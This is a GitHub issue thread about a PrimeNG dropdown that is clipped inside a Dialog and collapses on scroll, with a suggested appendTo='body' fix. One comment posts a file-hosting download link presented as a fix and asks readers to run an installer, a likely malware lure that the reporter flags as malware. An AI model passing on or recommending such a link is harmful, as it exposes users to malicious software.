### ISSUE TITLE
Component: Dialog

### ISSUE THREAD

**Issue by mertaksoy** [primefaces/primeng#16343]
### Describe the bug

When the dropdown is expanded, only a portion of the options are visible. The rest are hidden beyond the boundaries of the dialog box.
When attempting to scroll down to view and select the hidden options, the dropdown menu collapses, making it impossible to select any options that are not initially visible.

In the attached screenshot, the dropdown menu displays only the first two options out of five. When trying to scroll down to access the other options, the dropdown menu collapses, preventing selection.

![image](https://github.com/user-attachments/assets/0cc84661-a138-42b2-ac21-e90de692753c)

### Environment

primeng version: 17.18.9
angular version: 18

### Reproducer

https://stackblitz.com/edit/ja7jgx

### Angular version

18

### PrimeNG version

17.18.9

### Build / Runtime

Angular CLI App

### Language

TypeScript

### Node version (for AoT issues node --version)

22

### Steps to reproduce the behavior

Open the dialog box where the dropdown menu is located.
Click to expand the dropdown menu.
Attempt to scroll within the dropdown menu to view all options.

![image](https://github.com/user-attachments/assets/9e377c3a-c62a-48a0-8c91-f74a3eeeb6b8)

### Expected behavior

All options in the dropdown should be fully visible and selectable within the dialog box, regardless of their position.

**Comment by Tkyzxim** [comment]
try this
https://gofile.io/d/Lji8KD
select the desired compiler in the installer

**Comment by mertaksoy** [comment]
> try this https://gofile.io/d/Lji8KD select the desired compiler in the installer
malware 🚨

**Comment by fitterfly-jainam** [comment]
Hi @mertaksoy! Did you try adding `appendTo="body"` in the p-dropdown options? That's the most simplest fix as of now that PrimeNG Teams have provided. Usage something like this below:

```
<p-dropdown 
     [options]="cities" 
     [(ngModel)]="selectedCity" 
     optionLabel="name"
     placeholder="Select a City"
     appendTo="body"
/>
```
